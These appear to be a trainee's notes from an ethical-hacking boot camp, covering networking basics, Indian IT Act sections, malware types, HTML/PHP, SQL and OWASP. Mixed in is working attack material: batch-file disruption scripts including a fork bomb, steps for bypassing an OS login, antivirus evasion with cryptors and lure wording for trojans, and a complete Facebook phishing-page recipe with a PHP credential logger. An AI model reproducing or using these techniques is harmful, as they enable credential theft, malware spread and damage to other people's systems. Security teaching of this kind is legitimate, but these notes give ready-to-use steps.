Section Of All Notes

Boot Camp Day 1
===============
Session 1
=========
Introduction to Information Security
------------------------------------
Information
-----------
	Collection of data is known as Information. Information makes a complete meaning.

Data
----
	It is raw facts and figures. Data can be anything.
									Text
									Number
									Image
									Audio
									Video
	Data itself, a single piece of data never makes a sense.

Security
--------
	To protect and secure from leakage and breaches.

Information
===========
	Personal Information
	Sensitive Information
	Financial Information
	Economical Information
	Banking Information

Hackers
=======
	The person who have the highest amount of knowledge in the field of computer and technology.
		How a system is working.
		How processes are working.
		How my new technologies are working.
		Client side and server side process.

Hacking
=======
	Gaining someine's data with or without their authorisation. Legally or illegally.

Types of Hackers
================
1. White Hat Hacker
	They are good people, who work for the welfare of the organisation. They work for the security only.
		Rahul Tyagi
		Abhijeet Singh
		Sanjeev Multani
2. Black Hat Hacker
	They are really bad people, which brings chaos and destruction to the cyber society. They have only one thing in mind.... Money.
		Mitinik
		New Lizard Suqad
3. Grey Hat Hacker
	They are the combination of both. They hack into the stuff and uncurtain the dirty things. They have only one focus ---> Welfare of the society and the people.
		Anonymous
		The Legions
		Hacktivism
		Julian Assange --> The Wikileaks
		Edward Snoden

Script Kidies
-------------
	Copy + Paste --> Who just uses the codes and techniques that are created by others without knowning how things are working.
N00bz
-----
	They are new babies who are trying to learn something new in the world of cyber.
Crackers
--------
	They are not the hackers but they are very very good at cracking the passwords. File passwords, Folder password, OS password, Email password.

Why Do People Hack?
-------------------
	Security
	Money
	Revenge
	Curiosity|knowledge
	Fame
		Zoo Zoo Hacker
		Rafi Hacker

Cyber Crimes And Laws
=====================
IT Act 2000 and IT Act 2008
28 Types of cyber crime, but all of them are categorised into these few group:
	--> Hacking
	--> Identity Theft
	--> Insult, Online Defamation
	--> Harrasament
	--> Cyber Terrorism

Section 43:
	Penalty and compensation for damage to computer and computer system
Section 65:
	Tampering with Computer Source Documents
Section 66:
	Computer Related Offences
Section 67:
	Punishment for publishing or transmitting obsence material in electronic form
Section 71:
	Penalty For Misrepresentation
Section 72:
	Breach of confidentiality and privacy
Section 73:
	Penalty for publishing electronic signature certificate false in certain patricilar | Signature Forgery

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 2
=========

Network Terminology I
---------------------

Network
=======
	Connection of two or more IT Electronic Devices, with a sole purpose of Information Interchange.

Topology
========
	How my devices are connected to each other in the network. Physical layout of the network.

1. Star Topology
================
	When all of my end devices are connected to a central connecting device.
	If my central device is down, then communication is not possible.
2. Ring Topology
================
	When all of my end devices are connected in a closed circular chain.
		There are two ways of communication in Ring Topology
		1. Unidirectional
			Either clock or anti clock
		2. Bidirectional
			Data can go through any direction
3. Mesh Topology
================
	When all of my devices are connected to every device in the network.
4. Bus Topology
===============
	When all the end devices are connected to a central communicating line, which is known as Back Bone.
5. Hybrid Topology
==================
	When two or more type of topologies are connected in the network.

Protocols
=========
	Set of rules and regulations, which are required by every device to follow, to commnunicate in the network.

1. IP --> Internet Protocol
2. TCP --> Transmission Control Protocol
3. UDP --> User Datagram Protocol
4. FTP --> File Transfer Protocol
5. HTTP --> Hyper Text Transfer Protocol
6. SMTP --> Simple Mail Transfer Protocol
7. VoIP --> Voice Over Internet Protocol
8. DHCP --> Dynamic Host Configuration Protocol

IP Address
==========
	Internet Protocol Address
	-------------------------
	It is a virtual address which is provided to a device, which is connected to a network or internet, just for communicating. It is unique in a network.

Version of IP Address
=====================
	1. IPv4
	2. IPv6

1. IPv4 --> Internet Protocol Version 4
----------------------------------------
	It is a 32 bit long address, divided into 4 octets and seperated by a period.

	192.168.0.28 ---> IPv4
	4 octets --> 192|168|0|28
		Because I can represent a number using 8 bits(0 and 1)
	Periods --> dot(.)


192 = 128+64 = 11000000
168 = 128+32+8 = 10101000
0  = 00000000
28 = 16 + 8 + 4 = 00011100


128		64		32		16		8		4		2		1
=========================================================
1		1		0		0		0		0		0		0	192
1		0		1		0		1		0		0		0	168
0		0		0		0		0		0		0		0	0
0		0		0		1		1		1		0		0	28


192.168.0.28 = 11000000.10101000.00000000.00011100
It is composed of decimal numbers only. --> 0-9
Total Number Of IP Address --> 2^32 IP Addresses
	0.0.0.0 - 255.255.255.255

Classes of IPv4 Addresses
=========================
1. Class A --> 0.0.0.0 - 127.255.255.255
2. Class B --> 128.0.0.0 - 191.255.255.255
3. Class C --> 192.0.0.0 - 223.255.255.255
4. Class D --> 224.0.0.0 - 239.255.255.255
5. Class E --> 240.0.0.0 - 255.255.255.255

Class D and Class E --> Military and research and development purpose.

2. IPv6 -> Internet Protocol Version 6
======================================
	It is 128 bit long address. It is composed of hexa decimal values. Last 32 bit of IPv6 addresses are taken from MAC Address.
	0000:0000:0000:0000:0000:0000:0000:0000
	FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
	Total number of IPv6 --> 2^128
		0000:fe80:0000:f68c:50ff:fe5f:9718
								   5f:97:18
		f4:8c:50:5f:97:18

Types of IP Address
===================
1. Public IP Address | Global IP Address
		IP Address which is provided by the ISP or that of ISP
		Google.com --> myipaddress --> 125.63.71.34
					   ipcow.com ----> 125.63.71.34
					   ipchicken.com > 125.63.71.34

	User-Agent Information
	======================
			Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
			Hostname = 125.63.71.34.reverse.spectranet.in
			Device = X11
			Operating System = Ubuntu
			Browser Name = Firefox
			Browser Version = 60.0
			Is Mobile Device = False
			Is Beta = False
			Screen Resolution = 1366 x 768

2. Private IP Address | Local IP Address
		This is the IP Address which is provided to end devices which are connected in the network, by the router.
			MS-OS --> cmd ---> ipconfig
			Linux/Unix --> Terminal --> ifconfig
				ifconfig --> interface Configuration

IP Subnetting
=============
	Division of IP Address into further sub network so that IP wastage is reduced.


NAT --> Network Address Translation
===================================
It is a service used just above the router so that my Private IP Address can be converted and mapped into Public IP Address and Public IP Address into Private IP Address.

DHCP
====
Dynamic Host Configuration Protocol
-----------------------------------
	It is the protocol which works in the router. It is responsible for allocating an IP Address to the connected device in the network.

	IP-Pool
	=======
		It is collection of IP Addressm which can be provided to the devices.
	DHCP Server
	===========
		It is the server which provides IP Address to the devices from the IP Pool.

	DHCP allocates the IP Address on the basis of lease time period.

	MS-OS
	=====
	cmd ---> ipconfig /release
			 ipconfig /renew

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 3
=========
Network Terminology II
======================
Types Of Network
----------------
1. PAN --> Personal Area Network --> Bluetooth, ShareIt --> 1-10m
2. LAN --> Local Area Network --> WiFi, whole Campus --> 10m-5Km
3. MAN --> MetroP. Area Network --> Whole City --> 5km-50km
4. WAN --> Wide Area Network --> Internet -->

LAN --> Collection of PAN
MAN --> Collection of LAN
WAN --> Collection Of MAN

1. Intranet --> Intra -> Inside | Net -> Network
			Network Infrastructure which works inside a campus, cannot be accessed by people outside the campus
2. Internet --> Connection of two or more networks

Ports
=====
	Are specific gateways vai which a device can use or access the external service. There are two different types of ports:
		1. Physical Ports
		2. Virtual Ports

1. Physical Ports
=================
	These are the ports which we can see, touch and can take the services. Which are present in the device and are used for connecting some different hardwares.
		USB
		Audio Jack
		HDMI
		VGA
		Charging Port

2. Virtual Ports
================
	These are the ports via which i can use the network services. They are not tangible, but can use the services. External and specific services.
	There are 65,555+ virtual ports.
	They are also of three types:
	1. Well-Known | Pre-Defined Ports
	2. Registered Ports
	3. Dynamic Ports

	1. Well-Known | Pre-Defined Ports
	=================================
		These are the ports which are defined by internet community for running and hosting some specific services. The services over these ports cannot be changed.
			21 --> FTP
			22 --> SSH
			23 --> Telnet
			80 --> HTTP
			443 --> HTTPS
		These services can also run on other ports, but on these ports only these service will run.
		Ports under 1-1024 are categorised under this kind of port.

	2. Registered Ports
	===================
		These are the ports which are registered by certain organisations for running their specific services.
		Orcale ----> Database ---> MySQL --> 3306
		Apple -----> iPhone -----> iTunes -> 3689
		Black Berry Enterprise ---> server > 3101

	3. Dynamic Ports
	================
		These are the ports which are neither Pre-Defined nor registered ports, and can be used by any computer user locally for their own purpose.
			1337 --> LEET port | Hacker's Port

Our computer is a dumb device. We humans can remember the names very easily but computer can only understand a language, that is of numbers. So for computers it is easy to remember the number as compared to the name.

DNS
===
Domain Name System|service
==========================
	This service is used to map IP address to domain name and helps in fetching the response of the specified request.
		www.google.com ----> Open front end of google
		172.217.161.4 -----> Open front end of google

		www.google.co.in --> 172.217.24.227
www.google.co.in
	in --> indian domain
		co --> company domain inside india
			google ----> domain whose name is google
				root ---> www|mail|drive|calander

Proxy
=====
	These are the dummy servers, which are used for hiding and masking my IP Address. Public IP Address.
		kproxy.com

		ipcow.com ---> 125.63.71.34 ---> Original IP Address (Public)
		kproxy.com --> ipcow.com ---> 192.95.12.100 -> Proxy wala IP Address

VPN --> Virtual Private Network
===============================
	They just work like proxy servers but they are much more advance then the proxy servers in the following ways:
		1. They are used to maintain the anonymity, hiding and masking IP Address
		2. They provide the encryption of data.
		3. They provide the tunneling.
			Secret Passage
			Connecting to the internal network of an organisation

Services
========
	1. Online Based Service ----> kproxy.com
	2. Extension Based Service -> anonymox
	3. Standalone Service ------> Proper softwares or hardwares which provide us these services.
		psiphon3
		UltraSurf
		Proxpn
		HotSpot Shield
		openVPN

OSI Model
=========
Open System Interconnection Model
---------------------------------
It is a model which was used for commincation in the network. But due to some obvious reasons, this model was made an ideal model. This model is not used at all.
OSI is 7 layer approach model
1. Physical Layer
2. Data Link Layer
3. Network Layer
4. Transport Layer
5. Session Layer
6. Presentation Layer
7. Application Layer

TCPIP Model
============
	It is 4 layer based model. Which is similar to OSI model. Layers are again independent of each other but it's working is very very fast as compare to that of OSI model.

Web Technology Basics
=====================
1. Domain Name
2. Hosting Space
3. Server
4. DataBase
5. Technology
	Client Side
	Server Side

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 4
=========
Information Gathering and Digital Footprinting
==============================================
Phases of hacking
-----------------
	These phases are must to follow in order to perform any kind of hacking.
	1. Information Gathering
	2. Scanning
	3. Gaining Access
	4. Maintaining Access
	5. Covering Traces

Information Gathering
---------------------
	To collect as much Information as possible about the target.
	Information Gathering is divided into further
		1. Network Specific
		2. Target Specific

1. Network Specific
===================
	To collect the information about the network
			Number Of people Connected
			IP Address allocated to the connected devices
			MAC Address
			Name Of the Vendor
			If possible --> Access of the shared folder
		1. Advanced IP Scanner
		2. Angry IP Scanner
		3. Soft Perfect Network Scanner
				https://www.softperfect.com/products/networkscanner/

		NMAP --> Network Mapping tool

2. Target Specific
==================
	i. Web site or web application
	ii. Human Specific

Web site or web Application
===========================
	IP Address
		Ping
			> 65.52.169.46
	Server Information
		Dedicated or shared
		https://www.yougetsignal.com
	Database Information
	MX and NX Records
	Name of the registrar
	Technologies
	White list and Black List
			|--> robots.txt

		https://whois.net/
		https://www.yougetsignal.com
		https://whois.icann.org/en
		https://mxtoolbox.com/
		wapalyzer --> extension --> helps me in gathering information about the technologies used behind a web site or web application.
		Online Nmap
			https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap

Human Specific
==============
	Social Network
	Social Networking Websites
		Linkedin
		Twitter
		Facebook
	Dating Websites
	Matrimonial Websites
	Job Portals
	Fake Surveys
	Spy Services


Tools
=====
	Maltego
		It is corporate level information gathering tool. It helps in gathering information about each and every aspect.
		Community Edition ---> Free
			All transformations does not work in free edition.
		https://www.paterva.com/web7/downloads.php


OS Login Bypass
===============
When you log into the OS, then while starting the windows, you will be asked for password.
1. Online Method
2. Offline Method

1. Online Method
================
	When you need to crack or bypass the password, change the OS login password when the system is up, and you do not know the current password. It only works in windows ultimate or professional version.
	1. Right click on "My Computers"
	2. Click on "Manage"
	3. Click on "Local Users and Groups", in the left pane
	4. Click on "Users"
	5. Choose the user, for whom you want to change the password.
	6. Right Click
	7. Set Password

2. Offline Method
=================
	This is the condition, when the device is in shut down mode and we cannot open the group editing policies.
	SAM --> Security Account Manager
	C:WindowsSystem32ConfigSAM
		Hiren Boot CD
		Kon Boot CD
	These are live bootable OS. We use tools like Rufus, to make the media bootable.
	BIOS --> Basic Input Output System
	Live OS ---> It replaces the BIOS of the Computer or the device from the one which is in the bootable media.

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 5
=========
Malware Illustration
--------------------
Malware --> MAL + WARE
MAL -> MALicious
WARE -> softWARE

Malware are malicious softwares which can cause harm to the system. These can be anything, tools, applications, softwares, file.
Types Of Malware:
	1. Virus
	2. Worms
	3. Trojan
	4. Keyloggers
	5. Spywares
	6. Ransomware
	7. Botnet
	8. Rootkits
	9. Adwares

1. VIRUS
========
	Vital Information Resource Under Seize
	Virus can be an application, tool, software, which can harm the system and system files of the device.
	Symptoms of virus
		Slow
		Slow Processing
		Delete
		Attribute change
		Extension Change
		Shortcut keys|Files
	It will remain dormant, until a user executes it. Virus needs human assistance for executing itself.

Batch File Virus
================
1. Infinite Folder
------------------
	:loop
	mkdir %random%
	goto loop

2. Cascading folder and file
----------------------------
	:rudra
	mkdir rudr
	echo Hello Boys... Me acha hu...!! >>rudr.txt
	cd rudr
	goto rudra

3. Space Eating Virus
---------------------
	echo hello>>file.txt
	:loop
	type file.txt>>file.txt
	goto loop

4. Process Calling
------------------
	:loop
	start cmd.exe /c
	goto loop

5. Fork Bombing
---------------
	%0|%0

https://lucideustech.blogspot.com/2018/04/mac-os-login-screen-bypass-with.html

aran.kuanr@gmail.com
aran.k.uanr@gmail.com
ara.n.k.u.anr@gmail.com
a.r.a.n.k.u.a.n.r@gmail.com


2. Keyloggers
=============
	These are the applications which are used to grab the key strokes of the devices. It is just like an extra layer, which takes the keys and dump them on the screen.
	1. Online Based| Remote --> iStealer
	2. Local Storage
		Family Key Logger
			http://www.spyarsenal.com/download.html
		BPK Keylogger
		Refog Keylogger
	Screenshoter --> when ever you press anything, key or mouse click, then your application will take a screenshot.
	Screen Recorder

3. Ransomware
=============
	It is when your system gets hijack and all the system files get encrypted by the attacker and you need to pay some ransom to the attacker for decrypting the files.
		WannaCry
		Pateya
		Bad Rabbit

4. Worms
========
	These are the malwares which spread by itself. It nees human assistance just for once. Common feature
					Replication
					Copy Itself
					Speard Through Pen drive or mail
					It is target specific
		Conficker worm --> 1,00,000 Devices

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 6
=========
5. Trojans
----------
	These are the malwares which helps an attacker to gain the remote access of the target device. Remote Access ---> Backdooring. I can have the access, can download any file, can upload anyfile. can use anything and can manipulate the data.
	There are two types of trojans:
		1. Forward Connection
		2. Reverse Connection

1. Forward Connection
---------------------
	When the attacker have the target's IP Address, then he can directly attack the system.
	1. Target keeps on moving --> IP Address of the target will keep on changing
	2. It will be very very hard for an attacker to get the target's IP Address everytime, when he will change the location.


2. Reverse Connection
---------------------
	The attacker do always have his own IP Address. then the attacker can craft an application which is embedded with his own IP Address. He will send the application to the target. As soon as the target will execute the application, the attacker will receive a reverse remote connection.

RAT --> Remote Administrative|Access Tools
	These are third party tools which are used for creating Trojans.
	Dark Comet

How Does Anti-Malware Works
===========================
	All of the Anti-Malware works on the basis of signature. If they have the signature of the trojan in the database, it means, that it is a malware else the file is clean.

How to evade Anti-Malware?
==========================
	If I can change the signature it means I can evade the Anti-Malware. We will change the signature of trojan, so that we can evade Anti-Malware.
	With the help of these tools we can change the signature of the trojan:
		1. Binders
		2. Cryptors
		3. Hex Editors --> Neo Hex Editor
		4. Obfusscators -> Red Gate Smart Assambely

Binder and cryptor
==================
	Chrome Cryptor
	URGE Cryptor

Raw --> 57/65
Raw + Chrome Cryptor --> 35/65
Raw + Chrome Cryptor + URGE Cryptor --> 29/60
Raw + Chrome Cryptor + URGE Cryptor + Red Gate Smart Assambely --> 12/65

Downlaod and install, you will get paytm cash back of 500/-
Downlaod and install the best antivirus
Download the facebook hacker --> hack any facebook account by this application
Download and install ---> will help you in securing your device 100% gauranteed
Scan the network with angry IP Scanner

6. Botnets
==========
	BOTNET = BOT + NET
		BOT = roBOT
		NET = NETwork
	It means that you are connected in the network, and are controlling many devices.
	The attacker deployed the trojan in n number of systems and devices and controlling it. That whole network of trojan is known as botnet.
		Ares Botnet
		https://github.com/sweetsoftware/Ares

7. Rootkits
===========
	Which are or can be planted in the root of the device. Administrator, Kernel.
	These are the malwares which attacks and effects the kernel level and hard to find and hard to remove.

System Protection From Malwares and Secure System Configuration
===============================================================
Security
--------
	1. Firewall Should always be enabled.
	2. Anti-Virus Should always be installed and updated.
	3. Windows patches and updates.
	4. Always use sandbox|Virtualised environment for analysing or running a suspicious application.
		Sandboxie --> Virtual and simulated environment for analysing
		Virtual Box Simulation
	5. EXE radar

Configuration
-------------
	1. attrib --> for checking the attribute
	2. services
	3. Activated services
	4. Startup Service
		msconfig ---> startup
	5. netstat
	6. netstat -b
		-b --> applications which are binded to the port
	7. netstat -ona
		all | ports | Numeric Form
	8. Firewall Rule

https://lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 7
=========
Introduction to web Architecture and Components
-----------------------------------------------

1. Domain Name
---------------
	godaddy.com
	hostgator.com
2. Hosting Space
----------------
	000webhost.com
3. Server
---------
	They are the applications or hardwares which are used to run other programs. server side programs. php script.
	It manages the request and response.
	When a user enters something in the url bar ---> a request is generated
	At the same time, when user receives the data -> a response is received
	Servers are again of 2 types:
	1. MS OS Based server
		IIS --> Internet Information Services
	2. Linux Based Servers
		Apache | Tomcat
4. Database
-----------
	It is known as the backbone. It stores the data of the web site or the web application. It stores the data in a tabular way.
	Database --> Tables --> Columns --> Rows (Data)
	Database is again of two type:
	1. MS OS --> MSSQL
	2. Linux --> MySQL
5. Web Technologies
-------------------
	These are the coding languages or scripting languages in which our web site or web application is biuld.
	They are also divided into 2 types
	1. Client Side | Front End Scripting Language
	2. Server Side | Back End Scripting Language

	1. Client Side Scripting
		These provides the UI to the web site or the web application. It is what a user sees on the web browser.
		These require just a browser to run.
		HTML
	2. Server Side Scripting
		These are what works on back end.  They require a server to run.
		PHP

	MS OS --> ASP.NET
	Linux --> PHP

MS OS --> IIS + MSSQL + ASP.NET ---> Money
Linux --> Apache|Tomcat + MySQL + php ---> Money

Local Hosting Server
====================
By using these third party application for free, you can launch and host the application or the web site on the LAN and can run the testing for the same. There is no money involved, I can test the application for free.

1. Windows Based Server --> WAMPP
		W --> Windows
		A --> Apache
		M --> MySQL
		P --> Perl
		P --> Php

2. Linux Based Server --> LAMPP
		L --> Linux
		A --> Apache
		M --> MySQL
		P --> Perl
		P --> Php

3. Cross Platform Based Server --> XAMPP
		X --> Cross Platform
		A --> Apache
		M --> MySQL
		P --> Perl
		P --> Php

After Installing XAMPP
======================
1. Apache
2. MySQL
	we need to start these two services.

How To Access XAMPP Server
--------------------------
There are 3 ways via which we can access the xampp server. Open the browser
1. localhost
2. 127.0.0.1
3. Hosted system's IP Address

Web Security Misconfigurations
------------------------------
1. If I do have a good firewall, I am secure.
2. If I do have a good IDS and IPS, I am secure.
3. If the web site of the web application is using HTTPS, I am secure.

HTML
====
Hyper Text Markup Language
--------------------------
Front end developing language. which requires a browser to run.

1. HTML --> Each and everything of the front end is written in this tag.
<html>
xxxxxx
xxxxxx
xxxxxx
</html>

2. Head --> Contains the meta data
		Links of styles, title, date etc etc
		<head>
		xxxxxx
		xxxxxx
		xxxxxx
		xxxxxx
		</head>

3. title --> to provide the title to the tab
	<title>Name_Of_The_Title</title>

4. Body --> Which contains the whole of the code of the web site and the web application. I works after the head is closed.
<body>
xxxxxx
xxxxxx
xxxxxx
</body>

5. Paragraph -->
	<p>.....
	........
	........
	........
	</p>

6. Break
	<br> --> It is single tag. It doesnot needed to close
7. Heading
	There are 6 types of heading tag
	h1
	h2
	h3
	h4
	h5
	h6
	as the number increases, the font size decreases.

8. anchor  --> to provide the hyper link to anything
<a href="#">............</a>

9. Image
<img src=""></img>

10. Form
<form action="Kis page p redirect krna hai after clicking submit button" method="GET|POST">
</form>

11. Input
	<input type="text|number|date|password" id="Unique ID" name="Name Of the Element">
12. iframe
	<iframe src="http://www.lucideus.com"></iframe>

==========
pagee.html
==========
<html>
<head>
<title>CII</title>
</head>
<body>
<p>
<h1>Grade 2<br>
=======</h1>
<h2>Session 1<br>
---------</h2>
<a href="http://www.lucideus.com"><h3>Introduction To Cryptography</a><br>
----------------------------</h3>
Cryptography --> Conversion of text into another form, which is readable but
not understandable.
<br>
Conversion of plain text into an encrypted text via an algorithm which uses a
key, after transmission, decryption of the encrypted text into the plain text
via same algorithm and the key.
<br>

Plain Text --> It is a normal Text, which is typed by the user. which is
readable and understandable to everyone.<br>
Cipher Text --> Encrypted text, which is the output of the encryption.<br>
Encryption --> Process of converting plain text into a Cipher text, it is
readable but not understandable<br>
Decryption --> Reverse of encryption, conversion of Cipher text into a plain
text<br>
Algorithm --> It is the code which is used to encrypt and decrypt the plain
text into cipher text and cipher text into plain text.<br>
Key --> it is a special function, encryption and decryption is possible just
due to this key. <br
</p>
<img src="naruto.jpg" height="700"></img>
<form action="mera.html" method="GET">
Username :<input type="text" id="uname"><br>
Password :<input type="password" id="pass"><br>
<input type="submit" id="but">
</form>
</body>
</html>

=========
mera.html
=========
<html>
<head>
<title>Second Page</title>
</head>
<body>
<p>
This is my second page</p>
<iframe
src="http://www.lucideus.com"></iframe><br>
<img src="goku.jpg" height="500"></img>
</body>
</html>

PHP Basics
==========
Server Side Scripting Language

<?php
xxxx
xxxx
xxxx
xxxx
?>

<?php ---> Start of PHP code
?>  ---> End of php code
echo "Hello Guys"
$var   --> var is name of variable
$hack  --> Hack is name of variable
		$ ---> used to declare a variable
$_POST
$_GET

=========
CALL.html
=========
<html>
<head>
<title>Calculator</title>
</head>
<body>
<form action="calc.php" method="post" attribute="post">
First Value : <input type="text" id="first" name="first"><br>
Second Value : <input type="text" id="second" name="second"><br>
<input type="radio" name="group1" id="add" value="add" checked="true">ADD<br>
<input type="radio" name="group1" id="subtract" value="subtract">SUBTRACT<br>
<button type="submit" id="answer" value="answer">Calculate</button>
</form>
</body>
</html>

========
calc.php
========
<html>
<head>
<title>Jawab</title>
</head>
<body>
<p>
The Answer is:
<?php
$first=$_POST['first'];
$second = $_POST['second'];
if($_POST['group1'] == 'add')
{
$ans=$first+$second;
echo $ans;
}
if($_POST['group1'] == 'subtract')
{
$ans=$first-$second;
echo $ans;
}
?>
</p>
</body>
</html>

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 8
=========
Phishing
--------
	It is a technique in which an attacker creates and develop a fake page or a fake web site, which look completely authentic and genuine. but it is not. He deploys the same and make people to enter their credentials.
	1. Spear Phishing
	2. Vector Phishing | Credential Harvestor

1. Spear Phishing
-----------------
	Targeting a single or an individual or the crowd of people having common interest. Target Specific.
2. Credential Harvestor
-----------------------
	It is not target specific. Any kind of person can come and enter their credentials. I just need to collect the credentals of the crowd for my own purpose.

Create Facebook's Phishing Page
===============================
1. Open Your Browser
2. Goto www.facebook.com
3. Right Click on the login page ---> view page source
4. Select all ---> copy
5. Open notepad and paste the whole code
6. Scroll to the very top of the code.
7. Ctrl+F ---> action=
	action="https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110"
8. In the received parameter
	https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110
	Replace it with fish.php


fish.php
========
<?php
header ('Location: https://www.facebook.com');
$handle = fopen("coffee.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>

Understanding The Code
======================
<?php ---> start of the php code
header ('Location: https://www.facebook.com');
	when the working of the php code is done, then redirect the user to https://www.facebook.com
$handle = fopen("coffee.txt","a");
	$handle ---> Variable
	fopen --> to open a file
			It will open a file, coffee.txt
	When we open a file, I need to pass an attribute, which says in which mode the file should open. There are 3 major attributes
	1. Read --> r
		This attribute is used for just reading the content of the file.
	2. Write -> w
		This attribute is use to write the content in the file.
			1. If there is no file name which we passed, then it will create a new file with the same name.
			2. If there is a file with the name and there is data inside the file, it will delete all the data and start writing the new data from the beginning, Overwrite.
	3. Append-> a
		It is same like write, but it never deletes data but, it will start continue to write the data in the same file.
foreach($_POST as $variable => $value)
	It is for loop in php. It says jb tk mere pass data POST method se aa rha hai, tb tk ye loop chalta rahe.
	$variable => $value
	Phone or email => abc.cyb@gmail.com

fwrite($handle, $variable); --> 1
fwrite($handle, "="); ---> 2
fwrite($handle, $value); ---> 3
fwrite($handle, "
"); --->4
	fwrite --> to write data into the file
	fwrite($handle, $variable);
		$handle ---> specify the file in which we want to write
		$variable --> data which is to be stores in the file

	1					2 	3
		email or phone = 	Store the value inputed by the user
		4 --->it will enter a new line and start from the begining of the next line
fclose($handle);
	It means to close the open file ---> coffee.txt
exit;
	To stop the execution of the code and redirect to the user to the site specified in header
?> --> close of php code

IDN Homographic Attack
======================
	There are many languages in the world. Among those language there are many characters which are similar to english characters.
	To human eye, those similar characters do not have anby difference but to computer they do have the difference of their ASCII Value.

а, с, е, о, р, х and у --> Russian
a, c, e, o, p, x and y --> English

deepika Padukone --> English
dеерikа раdukоnе --> Cyrallic + English

Case Study - Must Read
======================
https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html

Social Engineering
==================
	To bluf someone in order to take the sensitive data. It is hacking without coding, Human mind hacking. An attacker can reterive the data or can make others to do his dirty works.

Fake Mails
==========
Sending    ----> https://emkei.cz/
				https://getgophish.com/
				https://www.youtube.com/watch?v=knc6Iq-hNcw&t=114s
Receiving  ----> www.temp-mail.org

haveibeenpwned.com
https://howsecureismypassword.net/

Email Tracing and Tracking
==========================
https://grabify.link/ --> Try it yourself
http://www.fuglekos.com/ip-grabber/index.html -->
http://whoreadme.com

Email Encryption
================
	End-to-end encryption.
	encipher.it

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 9
=========
Introduction to Vulnerability Assessment and Penetration Testing
----------------------------------------------------------------

VAPT --> Vulnerability Assessment and Penetration Testing
V --> Vulnerability
		Loopholes, week security, security misconfiguration. From where an attacker can intrude and compromise your system.
A --> Assessment
		To scan for the Vulnerability.
P --> Penetration
		To beach into the system using the above Vulnerability. To hack into or to compromise the system
T --> Testing
		To generate the  report and to pass down. To test the above Vulnerability and to create a report for the same.


VA --> Vulnerability Assessment
		To scan the web application and to report the Vulnerability
PT --> Penetration Testing
		To beach into the system and report about those Vulnerabilities.
VAPT --> Vulnerability Assessment and Penetration Testing

When we talk about web application VAPT
========================================
OWASP
=====
Open Web Application Security Project
-------------------------------------
	It is non-profit charitable organisation, which works towards the security of the web application. They gather the information from all around the globe. They gather the information through CTF initiative.
	They open challange the whole hacking community, to hack into the online system and capture the flag, in return, they will provide with the bounty. They gather the logs of the attacks which are performed in the CTF.
	After gathering the whole logs, they perform the analysis of these logs and categorise the attacks accordingly.
	They release a list of 10 attacks.
	OWASP TOP 10. --> top 10 attacks.

1. Injection
2. XSS --> Cross Site Scripting
3. CSRF --> Cross Site Request Forgery
4. IDOR --> Insecure Direct Object References
5. Sensitive Data Exposure
6. Missing Function Level Access Control
7. Broken Authentication and Session Management
8. Invalidated Redirects and Forwards
9. Security Misconfigurations
10. Using Components with known Vulnerabilities

OWASP 2013 --> Stable
OWASP 2017 --> Data sufficient
	https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf

https://cybermap.kaspersky.com/
https://www.fireeye.com/cyber-map/threat-map.html

DBMS
====
DataBase Management System
--------------------------
Where, how, when which data is suppose to be stores in which table, in which database, in which column.
DBA --> Database Administrator
	The Administrator of database, which manages the whole environment's database. DBA need to have the complete knowledge of a programing languages --> SQL

SQL --> Structured Query Language.
This is the programing languages which is used by the dba or any user to interact with the database.

Source --> Delhi
Destination --> Jalandhar
Date --> 10/6/2018
Class -> 2T

Select trains from database where source="Delhi" and destination="Jalandhar" having class="2T" on date=" 10/06/2018"

Queries
=======
1. Insert
	Insert into <table_name>(Column_Name) VALUES(Values to be inserted);

	INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES (Prashant, 10000, Roshan Garden Najafgarh, M);

2. Select
	Select * from <table_name>;

	Select * from info;

3. UPDATE
	Update <table_name> SET <value to change> where <condition>;

	UPDATE info SET Salary=30000 where Name="Abhijeet Singh";

4. Where
	It is a condition

	Select * from info where salary > 15000;
	Select * from info where name like "A%";

5. Delete
	DELETE from info WHERE Name="Abhijeet Singh";

6. AND
	SELECT * FROM `info` WHERE salary>=20000 and Gen='M';

7. Create
	Create table <table_name>(columns_name data_Type Length);

	CREATE table training(Name Text(20), Age int(3), Gender Text(1));

8. Order By
	It will arrange the data into either ascending order or in descending order

	SELECT * FROM `training` ORDER BY Name;

9. Group By
	To group the data

	SELECT * FROM `training` GROUP by Gender;

10. UNION
	SELECT name from info UNION select name from training;

	SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;

11.  Information_schema -->Meta database

SQL Injection
=============
Authentication Bypass
---------------------
	To bypass the authentication on any login form and gain teh access as the administrator.
